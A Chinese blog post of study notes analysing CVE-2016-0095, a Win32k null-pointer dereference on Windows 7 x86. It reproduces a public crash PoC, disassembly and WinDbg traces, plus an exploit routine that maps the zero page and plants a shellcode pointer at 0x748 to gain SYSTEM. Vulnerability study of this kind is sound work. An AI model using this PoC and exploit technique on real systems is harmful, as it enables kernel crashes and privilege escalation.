CVE-2016-0095提权漏洞学习笔记

最新推荐文章于 2025-07-27 22:54:07 发布
最新推荐文章于 2025-07-27 22:54:07 发布
阅读量237 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/text2207/article/details/128316571
本文介绍了一个存在于 Win32k 组件中的内核空指针解引用漏洞,详细分析了漏洞触发条件及利用过程。通过修改特定内存位置,使程序能够绕过检查并执行 ShellCode 完成提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.前言

1.漏洞信息 该漏洞是在win32k中的bGetRealizedBrush产生的,是一个内核空指针解引用的漏洞,利用该漏洞可以完成提权操作。由于有公开的POC,所以对这个漏洞的分析和利用就变得简单,POC代码如下:

/**
 * Author: bee13oy of CloverSec Labs
 * BSoD on Windows 7 SP1 x86 / Windows 10 x86
 * EoP to SYSTEM on Windows 7 SP1 x86
**/
 
#include <Windows.h>
 
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "user32.lib")
 
#ifndef W32KAPI
#define W32KAPIDECLSPEC_ADDRSAFE
#endif
 
unsigned int demo_CreateBitmapIndirect(void) {static BITMAP bitmap = { 0, 8, 8, 2, 1, 1 };static BYTE bits[8][2] = { 0xFF, 0, 0x0C, 0, 0x0C, 0, 0x0C, 0,0xFF, 0, 0xC0, 0, 0xC0, 0, 0xC0, 0 };
 bitmap.bmBits = bits;
 SetLastError(NO_ERROR);
 HBITMAP hBitmap = CreateBitmapIndirect(&bitmap);
 return (unsigned int)hBitmap;
}
 
#define eSyscall_NtGdiSetBitmapAttributes 0x1110
 
W32KAPI HBITMAP NTAPI NtGdiSetBitmapAttributes(HBITMAP argv0, DWORD argv1)
{HMODULE _H_NTDLL = NULL;PVOID addr_kifastsystemcall = NULL;_H_NTDLL = LoadLibrary(TEXT("ntdll.dll"));addr_kifastsystemcall = (PVOID)GetProcAddress(_H_NTDLL, "KiFastSystemCall");__asm{push argv1;push argv0;push 0x00;mov eax, eSyscall_NtGdiSetBitmapAttributes;mov edx, addr_kifastsystemcall;call edx;add esp, 0x0c;}
}
 
void Trigger_BSoDPoc() {HBITMAP hBitmap1 = (HBITMAP)demo_CreateBitmapIndirect();HBITMAP hBitmap2 = (HBITMAP)NtGdiSetBitmapAttributes((HBITMAP)hBitmap1, (DWORD)0x8f9);
 RECT rect = { 0 };rect.left = 0x368c;rect.top = 0x400000;HRGN hRgn = (HRGN)CreateRectRgnIndirect(&rect);
 HDC hdc = (HDC)CreateCompatibleDC((HDC)0x0);SelectObject((HDC)hdc, (HGDIOBJ)hBitmap2);
 HBRUSH hBrush = (HBRUSH)CreateSolidBrush((COLORREF)0x00edfc13);FillRgn((HDC)hdc, (HRGN)hRgn, (HBRUSH)hBrush);
}
 
int main()
{Trigger_BSoDPoc();
 return 0;
}

2.实验环境

  • 操作系统:Win7 x86 sp1
  • 编译器:Visual Studio 2017
  • 调试器:IDA,WinDbg

二.漏洞分析

编译运行POC,根据信息可以得知,崩溃发生在win32k!bGetRealizedBrush偏移0x38的地址。崩溃的原因是此时的eax为0,函数要对[eax + 0x24]这个地址中的数据进行验证的时候,会因为[0x24]不是个合法地址而产生崩溃。

kd> g
KDTARGET: Refreshing KD connection
Access violation - code c0000005 (!!! second chance !!!)
win32k!bGetRealizedBrush+0x38:
96980560 f6402401testbyte ptr [eax+24h],1
1: kd> r eax
eax=00000000
1: kd> k
ChildEBP RetAddr9c3339a0 969834af win32k!bGetRealizedBrush+0x38
9c3339b8 969f9b5e win32k!pvGetEngRbrush+0x1f
9c333a1c 96a7b6e8 win32k!EngBitBlt+0x337
9c333a54 96a7bb9d win32k!EngPaint+0x51
9c333c20 83e781ea win32k!NtGdiFillRgn+0x339
9c333c20 77c270b4 nt!KiFastCallEntry+0x12a
0012feac 77dd066b ntdll!KiFastSystemCallRet
0012feb0 77dd064f gdi32!NtGdiFillRgn+0xc
0012fed0 0042ba63 gdi32!FillRgn+0xb2

根据偏移,可以在IDA中找到相应的代码,根据IDA的解析,可以知道,此时是因为EBRUSHOBJ偏移0x34中的数据为0导致了崩溃

.text:BF840543 loc_BF840543: ; CODE XREF: bGetRealizedBrush(BRUSH *,EBRUSHOBJ *,int (*)(_BRUSHOBJ *,_SURFOBJ *,_SURFOBJ *,_SURFOBJ *,_XLATEOBJ *,ulong))+12↑j
.text:BF840543 pushebx
.text:BF840544 mov ebx, [ebp+arg_4] ; 将第二个参数赋给ebx,此时ebx指向EBRUSHOBJ结构体
.text:BF840547 pushesi
.text:BF840548 xor esi, esi
.text:BF84054A mov [ebp+var_24], eax
.text:BF84054D mov eax, [ebx+34h]; 将ebx偏移0x34中保存的数据赋给eax
.text:BF840550 mov [ebp+arg_0], esi
.text:BF840553 mov [ebp+var_2C], esi
.text:BF840556 mov [ebp+var_28], 0
.text:BF84055A mov eax, [eax+1Ch]
.text:BF84055D mov [ebp+arg_4], eax
.text:BF840560 testbyte ptr [eax+24h], 1 ; 崩溃产生的地点
.text:BF840564 mov [ebp+var_1C], esi
.text:BF840567 mov [ebp+var_10], esi
.text:BF84056A jzshort loc_BF84057A

三.漏洞利用

产生崩溃的原因是因为此时0地址并不是合法的地址,因此,只需要在0地址中申请一块内存,让0地址合法就可以防止崩溃,让程序继续运行。同时,该函数中存在函数调用,通过更改相关数据可以执行ShellCode。

在bGetRealizedBrush函数中,一共有三个地方执行了函数调用。其中的两个位置内容如下,都是通过第三个参数进行函数调用。由于无法控制第三个参数,所以这两个位置并不可以被利用。

.text:BF840763 loc_BF840763: 
.text:BF840763 oreax, 80000000h
.text:BF840768 pusheax
.text:BF840769 pushesi
.text:BF84076A pushesi
.text:BF84076B pushesi
.text:BF84076C pushecx
.text:BF84076D pushebx
.text:BF84076E call[ebp+arg_8]
.text:BF840771 testeax, eax
.text:BF840773 jzshort loc_BF84077D。。。
.text:BF840C27 loc_BF840C27: 
.text:BF840C27 push[ebp+var_24]
.text:BF840C2A pushesi
.text:BF840C2B push[ebp+var_1C]
.text:BF840C2E pushecx
.text:BF840C2F pusheax
.text:BF840C30 pushebx
.text:BF840C31 call[ebp+arg_8]

另一个位置是可以利用的,因为ebx在上面赋值为第二个参数,也就是EBRUSHOBJ结构体以后就没有发生改把。所以,此时的eax就是EBRUSHOBJ偏移0x34的数据,也就是0。所以,只要将0x748地址中的内容赋值为ShellCode的地址,就会在下面因为执行call edi而成功执行ShellCode完成提权。

.text:BF8407E4 mov eax, [ebx+34h]; eax=EBRUSHOBJ偏移0x34的数据
.text:BF8407E7 xor ecx, ecx
.text:BF8407E9 cmp dword ptr [eax+3Ch], 1
.text:BF8407ED mov eax, [ebp+arg_4]
.text:BF8407F0 mov edi, [eax+748h] ; edi = [eax+0x748] = [0x748]
.text:BF8407F6 setzcl
.text:BF8407F9 inc ecx
.text:BF8407FA mov [ebp+var_14], ecx
.text:BF8407FD cmp edi, esi
.text:BF8407FF jzshort loc_BF840823
.text:BF840801 testdword ptr [eax+24h], 8000h
.text:BF840808 jnz short loc_BF840810
.text:BF84080A mov eax, [eax+464h]
.text:BF840810
.text:BF840810 loc_BF840810: ;
.text:BF840810 mov ecx, [ebp+var_2C]
.text:BF840813 mov ecx, [ecx+2Ch]
.text:BF840816 mov edx, [ebx+0Ch]
.text:BF840819 pushecx
.text:BF84081A pushedx
.text:BF84081B push[ebp+var_14]
.text:BF84081E pusheax
.text:BF84081F calledi ; 调用函数
.text:BF840821 jmp short loc_BF840837

要达到此处的函数调用,需要绕过如下的两处验证。此时的eax和esi都是0,所以这两处就是在验证[0x590]和[0x592]是否为0。

.text:BF840799 loc_BF840799: 
.text:BF840799 movzx edx, word ptr [eax+590h]
.text:BF8407A0 cmp dx, si
.text:BF8407A3 jzloc_BF8406F7; [0x590]是否为0
.text:BF8407A9 add eax, 592h
.text:BF8407AE cmp [eax], si
.text:BF8407B1 jzloc_BF8406F7; [0x592]是否为0

如果跳转到loc_BF8406F是无法达到函数调用的地方完成提权,所以这两个地方都不能是0。因此,在0地址申请内存以后,除了在0x748赋值ShellCode地址以外,还需要将0x590和0x592赋值为非0值。

BOOL Init_2016_0095()
{BOOL bRet = TRUE;
 if (!AllocateZeroMemory()){bRet = FALSE;goto exit;}
 *(PWORD)0x590 = 0x1;*(PWORD)0x592 = 0x1;*(PDWORD)0x748 = (DWORD)&ShellCode_2016_0059;
 
exit:return bRet;
}

在崩溃点下断点以后,运行exp。此时,因为0地址有效,所以此时不会发生崩溃,程序可以继续向下运行。

3: kd> ba e1 win32k!bGetRealizedBrush+0x38
3: kd> g
Breakpoint 0 hit
win32k!bGetRealizedBrush+0x38:
96de0560 f6402401testbyte ptr [eax+24h],1
0: kd> p
win32k!bGetRealizedBrush+0x3c:
96de0564 8975e4mov dword ptr [ebp-1Ch],esi
0: kd> r eax
eax=00000000

继续向下运行到第一处验证,此时si为0,而由于0x590被写入了1,所以dx不为0,不会发生跳转。

1: kd> p
win32k!bGetRealizedBrush+0x271:
96de0799 0fb79090050000movzx edx,word ptr [eax+590h]
1: kd> p
win32k!bGetRealizedBrush+0x278:
96de07a0 663bd6cmp dx,si
1: kd> p
win32k!bGetRealizedBrush+0x27b:
96de07a3 0f844effffffjewin32k!bGetRealizedBrush+0x1cf (96de06f7)
1: kd> r dx
dx=1
1: kd> r si
si=0
1: kd> r eax
eax=00000000

继续运行到第二处验证,此时同理,不会发生跳转。

1: kd> p
win32k!bGetRealizedBrush+0x281:
96de07a9 0592050000add eax,592h
1: kd> p
win32k!bGetRealizedBrush+0x286:
96de07ae 663930cmp word ptr [eax],si
1: kd> p
win32k!bGetRealizedBrush+0x289:
96de07b1 0f8440ffffffjewin32k!bGetRealizedBrush+0x1cf (96de06f7)
1: kd> r si
si=0
1: kd> r eax
eax=00000592
1: kd> db 00000592
0000059201 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................
000005a200 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................

继续运行,到将0x748地址中的内容赋值给edi,此时的edi就会是ShellCode的地址。

1: kd> p
win32k!bGetRealizedBrush+0x2c8:
96de07f0 8bb848070000mov edi,dword ptr [eax+748h]
1: kd> p
win32k!bGetRealizedBrush+0x2ce:
96de07f6 0f94c1setecl
1: kd> r edi
edi=00401050

当运行到函数调用处,edi保存的依然是ShellCode的地址

1: kd> p
win32k!bGetRealizedBrush+0x2f1:
96de0819 51pushecx
1: kd> p
win32k!bGetRealizedBrush+0x2f2:
96de081a 52pushedx
1: kd> p
win32k!bGetRealizedBrush+0x2f3:
96de081b ff75ecpushdword ptr [ebp-14h]
1: kd> p
win32k!bGetRealizedBrush+0x2f6:
96de081e 50pusheax
1: kd> p
win32k!bGetRealizedBrush+0x2f7:
96de081f ffd7calledi
1: kd> r edi
edi=00401050

继续执行,就会执行ShellCode的代码完成提权

最终,程序会成功提权,如下图所示:

Jinmindong
关注
CVE-2016-0095分析
qq_41252520的博客
08-17 725
CVE-2016-0095 0x1 前言 这个漏洞曾被4年前的一场SSCTF比赛拿来出过题目,该漏洞利用起来很简单,但是善后工作并不能做得很完善,所以总体来说利用极不稳定。这里也不得不感叹,4年前的CTF比赛就这么硬核了,没有人带着打比赛真的是太难了~ 如果仅是作为赛后复盘的话,没必要说清楚漏洞产生,只管利用就好了,但是这里作为分析,所以还是尽可能讲清楚漏洞的前因后果。 0x2 漏洞简介 Microsoft Windows Vista SP2、Windows Server 2008 SP2和R2 SP1、
从零开始的cve分析- cve-2016-0095 简易记录
weixin_30814319的博客
03-21 365
0x00 前言 看k0shl大佬的SSCTF pwn450 Windows Kernel Exploitation Writeup一文,试着写一个x64下的poc。 poc地址:https://github.com/4M4Z4/cve-2016-0095-x64 0x01 环境 windows 7 旗舰版 Service Pack 1 64位 0x02 poc emmm,k0shl大...
CVE-2016-0095漏洞分析
leibso的博客
10-22 424
1 前言 瞻仰了k0shl和鹏哥 的漏洞分析,感慨万千,任重而道远。2 系统环境和工具 windows 7 32旗舰版 windbg 3 poc 3.1poc复现 首先k0shl大佬给出的poc(): /*** Author: bee13oy of CloverSec Labs* BSoD on Windows 7 SP1 x86 / Windows 10 x86* Eo...
C语言进程隐藏NTOpenprocess,抛砖引玉,谈谈VB下的隐藏进程检测
weixin_31684041的博客
05-23 384
PAGE:0049D59E;NTSTATUS__stdcallNtOpenProcess(PHANDLEProcessHandle,ACCESS_MASKDesiredAccess,POBJECT_ATTRIBUTESObjectAttributes,PCLIENT_IDClientId)PAGE:0049D59EpublicNtOpenPro...
shiro反序列化漏洞详解与复现(shiro-550/CVE-2016-4437)
ccccai22的博客
08-28 381
shiro反序列化漏洞(shiro-550/CVE-2016-4437)
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
2024年网络安全最全VMware Tools本地漏洞CVE-2024-31676分析与复现(3),书籍+视频+学习笔记+技能升资源库
2401_84302796的博客
05-06 1049
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
网站专包 所有的工具都在里面
10-21
网站专包.zip 网站专包 所有的工具都在里面
CTF两道CVE题目的具体分析
qq_41071646的博客
11-05 1161
在 unctf 里面发现一道 病毒常用的 office 的漏洞 一个是内核漏洞 CVE-2016-0095CVE-2017-11882 开始 先说一下 CVE-2016-0095 这个是内核漏洞 产生的原因是 内核空指针解引用的漏洞 漏洞出现在了 win32k 里面 题目是给了一个poc 然后让修复这个poc 并且拿到 system 的限 get shell...
CVE-2021-3493:Linux kernel特漏洞复现
Appleteachers的博客
04-22 1319
CVE-2021-3493:Linux kernel特漏洞复现 0x01 简介 linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 0x02 漏洞概述 Linux内核中overlayfs文件系统中的Ubuntu特定问题,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特。 0x03 影响版本 Ubun
漏洞预警:Tomcat曝本地漏洞CVE-2016-1240 )
weixin_34111819的博客
10-10 184
2019独角兽企业重金招聘Python工程师标准>>> ...
利用Vulnhub复现漏洞 - HTTPoxy漏洞CVE-2016-5385)
JiangBuLiu的博客
07-09 2452
HTTPoxy漏洞CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
【GD32】基于GD32+OV5640的摄像头模块学习记录
qq_73648789的博客
07-26 869
在信息载体中,图像包含的信息最为丰富。作为机器视觉领域的核心组件,摄像头的应用场景十分广泛,涵盖安防监控、野外探险、车牌识别检测等多个领域。按输出信号类型:可分为数字摄像头和模拟摄像头。数字摄像头输出的是数字信号,能直接与数字设备(如计算机、单片机等)进行数据传输和处理。模拟摄像头输出的是模拟信号,通常需要经过模数转换后才能被数字设备处理。按图像传感器材料构成:可分为 CCD(电荷耦合器件)摄像头和 CMOS(互补金属氧化物半导体)摄像头。
【电赛学习笔记】MaxiCAM 图像基础操作
YZYZYYNO_2的博客
07-23 1286
本文是一份MaixPy图像处理基础速查手册,详细介绍了12个核心功能模块的使用方法。主要内容包括:1)图像创建、加载和保存;2)格式转换与字节流互转;3)几何变换(缩放、裁剪、旋转等);4)绘图功能(矩形、圆形、线条等)与文字绘制;5)图像叠加和关键点标注;6)屏幕显示与主循环控制。手册采用Python代码示例+中文注释形式,供可直接复用的代码模板,特别说明了中文字体加载、图像格式转换等实用技巧,适合开发者快速查阅和实现基础图像处理功能。
技术派学习
m0_46159536的博客
07-25 284
整个社区系统按照业务边界进行初始化分:用户、文章、评论、专栏、消息通知;普通用户:社区的注册用户,围绕文章主体展开其覆盖的业务功能点;管理员:整个系统运营管理,如标签、分类管理、文章审核等。管理员:作为官方角色,负责整个社区的生态运营。社区系统的用户角色限:管理员>用户>读者。用户:编辑发布修改文章。
【PCIe 总线及设备入门学习专栏 5.3.4 -- PCIe PHY Firmware 固件加载流程】
最新发布
CodingCos的博客
07-27 38
Firmware加载流程需要根据PHY的要求进行设计,加载流程通常需要相关复位处于释放状态,且工作时钟保持稳定后才能开始,此时才能保证数据能够有效写入。常见设计中,firmware的数据容量较大(有些PHY需要的firmware容量为96KB),因此 firmware存储在rom中,在 PCIe PHY 开始建链之前,需要将Firmware写入到PHY中,本质是写入到存储固件代码的存储模块中。简单来说,firmware就是一套配置文件,决定了在特定的时刻给控制类寄存器写入合适的数值以完成物理层的电路功能。
CVE-2012-0158漏洞分析教程:从Od到Windbg的探索
这篇文章是对CVE-2012-0158安全漏洞的分析记录,旨在帮助读者理解和学习漏洞分析技术,特别是通过使用OD(OllyDbg)和Windbg等调试工具。作者到,这个分析过程受到了Chence和Metazhou两位专家的文章启发,他们供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值